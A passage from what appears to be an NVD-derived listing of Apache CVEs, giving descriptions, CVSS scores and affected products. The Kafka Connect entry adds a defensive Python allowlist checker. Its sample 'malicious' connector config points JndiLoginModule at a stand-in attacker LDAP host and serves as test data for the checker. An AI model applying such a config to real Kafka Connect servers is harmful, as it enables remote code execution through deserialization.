nvd@nist.gov 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H 1.8 5.2

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache xml_graphics_batik *
CVE-2022-44730

Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache XML Graphics Batik. This issue affects Apache XML Graphics Batik: 1.16. A malicious SVG can probe user profile / data and send it directly as a parameter to a URL.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.4 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 1.8 2.5

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache xml_graphics_batik *
CVE-2022-45046

DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.

Products Affected

Vendor Product Version
apache camel 3.19.0
apache camel *
CVE-2022-45047

Class org.apache.sshd.server.keyprovider.SimpleGeneratorHostKeyProvider in Apache MINA SSHD <= 2.9.1 uses Java deserialization to load a serialized java.security.PrivateKey. The class is one of several implementations that an implementor using Apache MINA SSHD can choose for loading the host keys of an SSH server.

Products Affected

Vendor Product Version
apache sshd *
CVE-2022-45048

Authenticated users with appropriate privileges can create policies having expressions that can exploit a code execution vulnerability. This issue affects Apache Ranger: 2.3.0. Users are recommended to update to version 2.4.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.4 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H 1.7 6.0

Products Affected

Vendor Product Version
apache ranger 2.3.0
CVE-2022-45064

The SlingRequestDispatcher doesn't correctly implement the RequestDispatcher API resulting in a generic type of include-based cross-site scripting issues on the Apache Sling level. The vulnerability is exploitable by an attacker that is able to include a resource with specific content-type and control the include path (i.e. writing content). The impact of a successful attack is privilege escalation to administrative power. Please update to Apache Sling Engine >= 2.14.0 and enable the "Check Content-Type overrides" configuration option.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.0 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H 1.3 6.0

Products Affected

Vendor Product Version
apache sling *
apache apache_sling_engine *
CVE-2022-45135

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Cocoon. This issue affects Apache Cocoon: from 2.2.0 before 2.3.0. Users are recommended to upgrade to version 2.3.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache cocoon *
CVE-2022-45136

Apache Jena SDB 3.17.0 and earlier is vulnerable to a JDBC Deserialisation attack if the attacker is able to control the JDBC URL used or cause the underlying database server to return malicious data. The MySQL JDBC driver in particular is known to be vulnerable to this class of attack. As a result, an application using Apache Jena SDB can be subject to RCE when connected to a malicious database server. Apache Jena SDB has been EOL since December 2020 and users should migrate to alternative options, e.g. Apache Jena TDB 2.

Products Affected

Vendor Product Version
apache jena_sdb *
CVE-2022-45143

The JsonErrorReportValve in Apache Tomcat 8.5.83, 9.0.40 to 9.0.68 and 10.1.0-M1 to 10.1.1 did not escape the type, message or description values. In some circumstances these are constructed from user provided data and it was therefore possible for users to supply values that invalidated or manipulated the JSON output.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 8.5.83
apache tomcat 10.1.1
CVE-2022-45347

Apache ShardingSphere-Proxy prior to 5.3.0, when using MySQL as the database backend, didn't clean up the database session completely after client authentication failed, which allowed an attacker to execute normal commands by constructing a special MySQL client. This vulnerability has been fixed in Apache ShardingSphere 5.3.0.

Products Affected

Vendor Product Version
apache shardingsphere *
CVE-2022-45378

In the default configuration of Apache SOAP, an RPCRouterServlet is available without authentication. This gives an attacker the possibility to invoke methods on the classpath that meet certain criteria. Depending on what classes are available on the classpath this might even lead to arbitrary remote code execution. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache soap *
CVE-2022-45402

In Apache Airflow versions prior to 2.4.3, there was an open redirect in the webserver's `/login` endpoint.

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-45438

When explicitly enabling the feature flag DASHBOARD_CACHE (disabled by default), the system allowed for an unauthenticated user to access dashboard configuration metadata using a REST API Get endpoint. This issue affects Apache Superset version 1.5.2 and prior versions and version 2.0.0.

Products Affected

Vendor Product Version
apache superset 2.0.0
apache superset *
CVE-2022-45462

Alarm instance management has command injection when there is a specific command configured. It is only for logged-in users. We recommend you upgrade to version 2.0.6 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2022-45470

Missing input validation in Apache Hama may cause information disclosure through path traversal and XSS. Since Apache Hama is EOL, we do not expect these issues to be fixed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache hama *
CVE-2022-45786

There are issues with the AGE drivers for Golang and Python that enable SQL injections to occur. This impacts AGE for PostgreSQL 11 & AGE for PostgreSQL 12, all versions up-to-and-including 1.1.0, when using those drivers. The fix is to update to the latest Golang and Python drivers in addition to the latest version of AGE that is used for PostgreSQL 11 or PostgreSQL 12. The update of AGE will add a new function to enable parameterization of the cypher() function, which, in conjunction with the driver updates, will resolve this issue.

Background (for those who want more information): After thoroughly researching this issue, we found that due to the nature of the cypher() function, it was not easy to parameterize the values passed into it. This enabled SQL injections, if the developer of the driver wasn't careful. The developers of the Golang and Python drivers didn't fully utilize parameterization, likely because of this, thus enabling SQL injections. The obvious fix to this issue is to use parameterization in the drivers for all PG SQL queries. However, parameterizing all PG queries is complicated by the fact that the cypher() function call itself cannot be parameterized directly, as it isn't a real function. At least, not the parameters that would take the graph name and cypher query. The reason the cypher() function cannot have those values parameterized is because the function is a placeholder and never actually runs. The cypher() function node, created by PG in the query tree, is transformed and replaced with a query tree for the actual cypher query during the analyze phase. The problem is that parameters - that would be passed in and that the cypher() function transform needs to be resolved - are only resolved in the execution phase, which is much later. Since the transform of the cypher() function needs to know the graph name and cypher query prior to execution, they can't be passed as parameters.

The fix that we are testing right now, and are proposing to use, is to create a function that will be called prior to the execution of the cypher() function transform. This new function will allow values to be passed as parameters for the graph name and cypher query. As this command will be executed prior to the cypher() function transform, its values will be resolved. These values can then be cached for the immediately following cypher() function transform to use. As added features, the cached values will store the calling session's pid, for validation. And, the cypher() function transform will clear this cached information after function invocation, regardless of whether it was used. This method will allow the parameterizing of the cypher() function indirectly and provide a way to lock out SQL injection attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

Products Affected

Vendor Product Version
apache age *
CVE-2022-45787

Improper, lax permissions on the temporary files used by MIME4J TempFileStorageProvider may lead to information disclosure to other local users. This issue affects Apache James MIME4J version 0.8.8 and prior versions. We recommend users to upgrade to MIME4J version 0.8.9 or later.

Products Affected

Vendor Product Version
apache james *
CVE-2022-45801

Apache StreamPark 1.0.0 to 2.0.0 has an LDAP injection vulnerability. LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to SQL Injection. LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree. This risk may only occur when the user logs in with LDAP; user name and password login will not be affected. Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.

Products Affected

Vendor Product Version
apache streampark *
CVE-2022-45802

StreamPark allows any user to upload a jar as an application, but there is no mandatory verification of the uploaded file type, allowing users to upload some high-risk files, and possibly to upload them to any directory. Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.

Products Affected

Vendor Product Version
apache streampark *
CVE-2022-45855

SpringEL injection in the metrics source in Apache Ambari version 2.7.0 to 2.7.6 allows a malicious authenticated user to execute arbitrary code remotely. Users are recommended to upgrade to 2.7.7.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.0 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 2.1 5.9

Products Affected

Vendor Product Version
apache ambari *
CVE-2022-45875

Improper validation of script alert plugin parameters in Apache DolphinScheduler may lead to a remote command execution vulnerability. This issue affects Apache DolphinScheduler version 3.0.1 and prior versions; version 3.1.0 and prior versions. This attack can be performed only by authenticated users who can log in to DS.

Products Affected

Vendor Product Version
apache dolphinscheduler *
apache dolphinscheduler 3.1.0
CVE-2022-45910

Improper neutralization of special elements used in an LDAP query ('LDAP Injection') vulnerability in ActiveDirectory and Sharepoint ActiveDirectory authority connectors of Apache ManifoldCF allows an attacker to manipulate the LDAP search queries (DoS, additional queries, filter manipulation) during user lookup, if the username or the domain string are passed to the UserACLs servlet without validation. This issue affects Apache ManifoldCF version 2.23 and prior versions.

Products Affected

Vendor Product Version
apache manifoldcf *
CVE-2022-45935

Usage of temporary files with insecure permissions by the Apache James server allows an attacker with local access to access private user data in transit. Vulnerable components include the SMTP stack and the IMAP APPEND command. This issue affects Apache James server version 3.7.2 and prior versions.

Products Affected

Vendor Product Version
apache james *
CVE-2022-46337

A cleverly devised username might bypass LDAP authentication checks. In LDAP-authenticated Derby installations, this could let an attacker fill up the disk by creating junk Derby databases. In LDAP-authenticated Derby installations, this could also allow the attacker to execute malware which was visible to and executable by the account which booted the Derby server. In LDAP-protected databases which weren't also protected by SQL GRANT/REVOKE authorization, this vulnerability could also let an attacker view and corrupt sensitive data and run sensitive database functions and procedures. Mitigation: Users should upgrade to Java 21 and Derby 10.17.1.0. Alternatively, users who wish to remain on older Java versions should build their own Derby distribution from one of the release families to which the fix was backported: 10.16, 10.15, and 10.14. Those are the releases which correspond, respectively, with Java LTS versions 17, 11, and 8.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache derby *
apache derby 10.16.1.1
CVE-2022-46363

A vulnerability in Apache CXF before versions 3.5.5 and 3.4.10 allows an attacker to perform a remote directory listing or code exfiltration. The vulnerability only applies when the CXFServlet is configured with both the static-resources-list and redirect-query-check attributes. These attributes are not supposed to be used together, and so the vulnerability can only arise if the CXF service is misconfigured.

Products Affected

Vendor Product Version
apache cxf *
CVE-2022-46364

An SSRF vulnerability in parsing the href attribute of XOP:Include in MTOM requests in versions of Apache CXF before 3.5.5 and 3.4.10 allows an attacker to perform SSRF style attacks on webservices that take at least one parameter of any type.

Products Affected

Vendor Product Version
apache cxf *
CVE-2022-46365

In Apache StreamPark 1.0.0 before 2.0.0, when the user successfully logs in and modifies their profile, the username is passed to the server layer as a parameter, but it is not verified whether the username is that of the currently logged-in user or whether the user is legitimate. This allows malicious attackers to send any username to modify and reset the account. Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later.

Products Affected

Vendor Product Version
apache streampark *
CVE-2022-46366

Apache Tapestry 3.x allows deserialization of untrusted data, leading to remote code execution. This issue is similar to but distinct from CVE-2020-17531, which applies to the (also unsupported) 4.x version line. NOTE: This vulnerability only affects Apache Tapestry version line 3.x, which is no longer supported by the maintainer. Users are recommended to upgrade to a supported version line of Apache Tapestry.

Products Affected

Vendor Product Version
apache tapestry *
CVE-2022-46421

Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow Hive Provider. This issue affects Apache Airflow Hive Provider: before 5.0.0.

Products Affected

Vendor Product Version
apache apache-airflow-providers-apache-hive *
CVE-2022-46651

Apache Airflow, versions before 2.6.3, is affected by a vulnerability that allows an unauthorized actor to gain access to sensitive information in Connection edit view. This vulnerability is considered low since it requires someone with access to Connection resources specifically updating the connection to exploit it. Users should upgrade to version 2.6.3 or later which has removed the vulnerability.

Products Affected

Vendor Product Version
apache airflow *
CVE-2022-46751

Improper Restriction of XML External Entity Reference, XML Injection (aka Blind XPath Injection) vulnerability in Apache Software Foundation Apache Ivy. This issue affects any version of Apache Ivy prior to 2.5.2. When Apache Ivy prior to 2.5.2 parses XML files - either its own configuration, Ivy files or Apache Maven POMs - it will allow downloading external document type definitions and expand any entity references contained therein when used. This can be used to exfiltrate data, access resources only the machine running Ivy has access to, or disturb the execution of Ivy in different ways. Starting with Ivy 2.5.2, DTD processing is disabled by default, except when parsing Maven POMs, where the default is to allow DTD processing but only to include a DTD snippet shipping with Ivy that is needed to deal with existing Maven POMs that are not valid XML files but are nevertheless accepted by Maven. Access can be made more lenient via newly introduced system properties where needed. Users of Ivy prior to version 2.5.2 can use Java system properties to restrict processing of external DTDs; see the section about "JAXP Properties for External Access restrictions" inside Oracle's "Java API for XML Processing (JAXP) Security Guide".

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L 3.9 4.2
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L 3.9 4.2

Products Affected

Vendor Product Version
apache ivy *
CVE-2022-46769

An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.2 and prior may allow an authenticated remote attacker to perform a reflected cross-site scripting (XSS) attack in the site group feature. Upgrade to Apache Sling App CMS >= 1.1.4

Products Affected

Vendor Product Version
apache sling_cms *
CVE-2022-46870

An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Zeppelin allows logged-in users to execute arbitrary javascript in other users' browsers. This issue affects Apache Zeppelin before 0.8.2. Users are recommended to upgrade to a supported version of Zeppelin.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2022-46907

A carefully crafted request on several JSPWiki plugins could trigger an XSS vulnerability on Apache JSPWiki, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.12.0 or later.

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-47184

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Traffic Server. This issue affects Apache Traffic Server: 8.0.0 to 9.2.0.

Products Affected

Vendor Product Version
apache traffic_server *
debian debian_linux 12.0
debian debian_linux 11.0
CVE-2022-47185

Improper input validation vulnerability on the Range header in Apache Software Foundation Apache Traffic Server. This issue affects Apache Traffic Server: through 9.2.1.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2022-47500

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Apache Software Foundation Apache Helix UI component. This issue affects Apache Helix all releases from 0.8.0 to 1.0.4. Solution: the forward component was removed, since it was improperly designed for UI embedding. Users should upgrade to 1.1.0 to fix this issue.

Products Affected

Vendor Product Version
apache helix *
CVE-2022-47501

Arbitrary file reading vulnerability in Apache Software Foundation Apache OFBiz when using the Solr plugin. This is a pre-authentication attack. This issue affects Apache OFBiz: before 18.12.07.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2022-47502

Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose. Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache openoffice *
CVE-2022-47894

Improper Input Validation vulnerability in Apache Zeppelin SAP. This issue affects Apache Zeppelin SAP: from 0.8.0 before 0.11.0. As this project is retired, no release that fixes this issue is planned. Users are recommended to find an alternative or restrict access to the instance to trusted users. The fix was merged in the source code, but Zeppelin decided to retire the SAP component. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2022-47937

Improper input validation in the Apache Sling Commons JSON bundle allows an attacker to trigger unexpected errors by supplying specially-crafted input. The org.apache.sling.commons.json bundle has been deprecated as of March 2017 and should not be used anymore. Consumers are encouraged to consider the Apache Sling Commons Johnzon OSGi bundle provided by the Apache Sling project, but may of course use other JSON libraries.

Products Affected

Vendor Product Version
apache sling_commons_json *
CVE-2023-22602

When using Apache Shiro before 1.11.0 together with Spring Boot 2.6+, a specially crafted HTTP request may cause an authentication bypass. The authentication bypass occurs when Shiro and Spring Boot are using different pattern-matching techniques. Both Shiro and Spring Boot < 2.6 default to Ant style pattern matching. Mitigation: Update to Apache Shiro 1.11.0, or set the following Spring Boot configuration value: `spring.mvc.pathmatch.matching-strategy = ant_path_matcher`

Products Affected

Vendor Product Version
vmware spring_boot 2.6.0
apache shiro *
CVE-2023-22665

There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query.

Products Affected

Vendor Product Version
apache jena *
CVE-2023-22832

The ExtractCCDAAttributes Processor in Apache NiFi 1.2.0 through 1.19.1 does not restrict XML External Entity references. Flow configurations that include the ExtractCCDAAttributes Processor are vulnerable to malicious XML documents that contain Document Type Declarations with XML External Entity references. The resolution disables Document Type Declarations and disallows XML External Entity resolution in the ExtractCCDAAttributes Processor.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache nifi *
CVE-2023-22849

An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.4 and prior may allow an authenticated remote attacker to perform a reflected cross-site scripting (XSS) attack in multiple features. Upgrade to Apache Sling App CMS >= 1.1.6

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache sling_cms *
CVE-2023-22884

Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache Airflow and Apache Software Foundation Apache Airflow MySQL Provider. This issue affects Apache Airflow: before 2.5.1; Apache Airflow MySQL Provider: before 4.0.0.

Products Affected

Vendor Product Version
apache airflow *
apache apache-airflow-providers-mysql *
apache airflow_mysql_provider *
CVE-2023-22886

Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow JDBC Provider. The Connection URL parameters of an Airflow JDBC Provider connection had no restrictions, which made it possible to achieve RCE through different types of JDBC drivers and obtain the permissions of the Airflow server. This issue affects Apache Airflow JDBC Provider: before 4.0.0.

Products Affected

Vendor Product Version
apache apache-airflow-providers-jdbc *
CVE-2023-22887

Apache Airflow, versions before 2.6.3, is affected by a vulnerability that allows an attacker to perform unauthorized file access outside the intended directory structure by manipulating the run_id parameter. This vulnerability is considered low since it requires an authenticated user to exploit it. It is recommended to upgrade to a version that is not affected

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-22888

Apache Airflow, versions before 2.6.3, is affected by a vulnerability that allows an attacker to cause a service disruption by manipulating the run_id parameter. This vulnerability is considered low since it requires an authenticated user to exploit it. It is recommended to upgrade to a version that is not affected

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-22946

In Apache Spark versions prior to 3.4.0, applications using spark-submit can specify a 'proxy-user' to run as, limiting privileges. The application can execute code with the privileges of the submitting user, however, by providing malicious configuration-related classes on the classpath. This affects architectures relying on proxy-user, for example those using Apache Livy to manage submitted applications. Update to Apache Spark 3.4.0 or later, and ensure that spark.submit.proxyUser.allowCustomClasspathInClusterMode is set to its default of "false", and is not overridden by submitted applications.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N 3.1 2.7

Products Affected

Vendor Product Version
apache spark *
CVE-2023-23638

A deserialization vulnerability existed in Dubbo generic invocation, which could lead to malicious code execution. This issue affects Apache Dubbo 2.7.x version 2.7.21 and prior versions; Apache Dubbo 3.0.x version 3.0.13 and prior versions; Apache Dubbo 3.1.x version 3.1.5 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.0 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L 1.6 3.4
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache dubbo *
CVE-2023-24829

Incorrect Authorization vulnerability in Apache Software Foundation Apache IoTDB. This issue affects the iotdb-web-workbench component from 0.13.0 before 0.13.3. iotdb-web-workbench is an optional component of IoTDB, providing a web console for the database. This problem is fixed from version 0.13.3 of iotdb-web-workbench onwards.

Products Affected

Vendor Product Version
apache iotdb *
CVE-2023-24830

Improper Authentication vulnerability in Apache Software Foundation Apache IoTDB. This issue affects the iotdb-web-workbench component: from 0.13.0 before 0.13.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache iotdb *
CVE-2023-24831

Improper Authentication vulnerability in Apache Software Foundation Apache IoTDB. This issue affects Apache IoTDB Grafana Connector: from 0.13.0 through 0.13.3. Attackers could log in without authorization. This is fixed in 0.13.4.

Products Affected

Vendor Product Version
apache iotdb *
CVE-2023-24977

Out-of-bounds Read vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick https://github.com/apache/inlong/pull/7214 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-24997

Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.1.0 through 1.5.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick https://github.com/apache/inlong/pull/7223 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-24998

Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads. Note that, like all of the file upload limits, the new configuration option (FileUploadBase#setFileCountMax) is not enabled by default and must be explicitly configured.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache commons_fileupload *
apache commons_fileupload 1.0
debian debian_linux 11.0
CVE-2023-25141

Apache Sling JCR Base < 3.1.12 has a critical injection vulnerability when running on old JDK versions (JDK 1.8.191 or earlier) through utility functions in RepositoryAccessor. The functions getRepository and getRepositoryFromURL allow an application to access data stored in a remote location via JNDI and RMI. Users of Apache Sling JCR Base are recommended to upgrade to Apache Sling JCR Base 3.1.12 or later, or to run on a more recent JDK.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache sling_jcr_base *
CVE-2023-25194

A possible security vulnerability has been identified in the Apache Kafka Connect API. Exploiting it requires access to a Kafka Connect worker and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka Connect 2.3.0. When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute Java deserialization gadget chains on the Kafka Connect server. An attacker can thereby cause unrestricted deserialization of untrusted data, or RCE, when suitable gadgets are on the classpath. Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector client override policy that permits them. Since Apache Kafka 3.4.0, a system property ("-Dorg.apache.kafka.disallowed.login.modules") has been added to disable the problematic login modules in SASL JAAS configuration, and "com.sun.security.auth.module.JndiLoginModule" is disabled by default in Apache Kafka Connect 3.4.0. Kafka Connect users are advised to validate connector configurations and only allow trusted JNDI configurations, and to examine connector dependencies for vulnerable versions and either upgrade their connectors, upgrade that specific dependency, or remove the connectors as remediation options.
Finally, in addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector client config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.
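The advice above to validate connector configurations and allow only trusted login modules can be applied before a config ever reaches the REST API. The following is an added example, not Kafka's own code: a pre-flight check that extracts every JAAS login module from `sasl.jaas.config` and its three `*.override.` variants and rejects any module not on an operator-maintained allowlist. The allowlist and both sample connector configs are assumptions constructed for the example.

```python
# Added example, not Kafka's own code: a pre-flight check for connector
# configurations submitted to the Connect REST API, implementing the advisory's
# advice to validate configurations and allow only trusted login modules in
# sasl.jaas.config. The allowlist and both sample configs are assumptions.
import re
from typing import Dict, List, Tuple

JAAS_KEY = "sasl.jaas.config"
# Prefixes under which a connector may override its own clients' settings
OVERRIDE_PREFIXES = ("producer.override.", "consumer.override.", "admin.override.")

# Login modules an operator expects to see; JndiLoginModule is deliberately absent.
TRUSTED_LOGIN_MODULES = frozenset({
    "org.apache.kafka.common.security.plain.PlainLoginModule",
    "org.apache.kafka.common.security.scram.ScramLoginModule",
    "com.sun.security.auth.module.Krb5LoginModule",
})

# A JAAS entry is "<module class> <flag> [option=value ...];"
_JAAS_ENTRY = re.compile(
    r"^\s*([A-Za-z_][\w.$]*)\s+(?:required|requisite|sufficient|optional)\b",
    re.IGNORECASE,
)


def login_modules_of(jaas_config: str) -> List[str]:
    """Return the login module class names declared in a JAAS config string."""
    modules = []
    for entry in jaas_config.split(";"):
        if not entry.strip():
            continue
        m = _JAAS_ENTRY.match(entry)
        modules.append(m.group(1) if m else "<unparseable>")
    return modules


def jaas_keys(config: Dict[str, str]) -> List[str]:
    """Keys in a connector config that carry a JAAS login configuration."""
    wanted = {JAAS_KEY, *(p + JAAS_KEY for p in OVERRIDE_PREFIXES)}
    return [k for k in config if k in wanted]


def find_untrusted_jaas(config: Dict[str, str]) -> List[Tuple[str, str]]:
    """(key, module) pairs whose login module is not on the allowlist.
    An unparseable entry is reported too; an empty result means the config may be submitted."""
    findings = []
    for key in jaas_keys(config):
        for module in login_modules_of(config[key]):
            if module not in TRUSTED_LOGIN_MODULES:
                findings.append((key, module))
    return findings


# Constructed sample configs
BENIGN_CONNECTOR = {
    "connector.class": "org.apache.kafka.connect.file.FileStreamSinkConnector",
    "topics": "orders",
    "producer.override.sasl.jaas.config":
        'org.apache.kafka.common.security.plain.PlainLoginModule required '
        'username="connector" password="secret";',
}

MALICIOUS_CONNECTOR = {
    "connector.class": "org.apache.kafka.connect.file.FileStreamSinkConnector",
    "topics": "orders",
    "consumer.override.sasl.jaas.config":
        'com.sun.security.auth.module.JndiLoginModule required '
        'user.provider.url="ldap://attacker.invalid/";',   # constructed, not a real host
}

if __name__ == "__main__":
    for name, cfg in (("benign", BENIGN_CONNECTOR), ("malicious", MALICIOUS_CONNECTOR)):
        print(name, find_untrusted_jaas(cfg) or "OK")
```

Run as a gate in front of `PUT /connectors/{name}/config` (or inside a custom `ConnectorClientConfigOverridePolicy`, as the advisory suggests); an allowlist of modules is stricter than the blocklist the `disallowed.login.modules` property provides, and catches unparseable JAAS strings that a blocklist would pass through.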

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache kafka_connect *
apache kafka *
CVE-2023-25195

Server-Side Request Forgery (SSRF) vulnerability in Apache Software Foundation Apache Fineract. Authorized users with limited permissions can gain access to the server and may be able to use the server for any outbound traffic. This issue affects Apache Fineract: from 1.4 through 1.8.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache fineract *
CVE-2023-25196

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache Fineract. Authorized users may be able to change or add data in certain components. This issue affects Apache Fineract: from 1.4 through 1.8.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
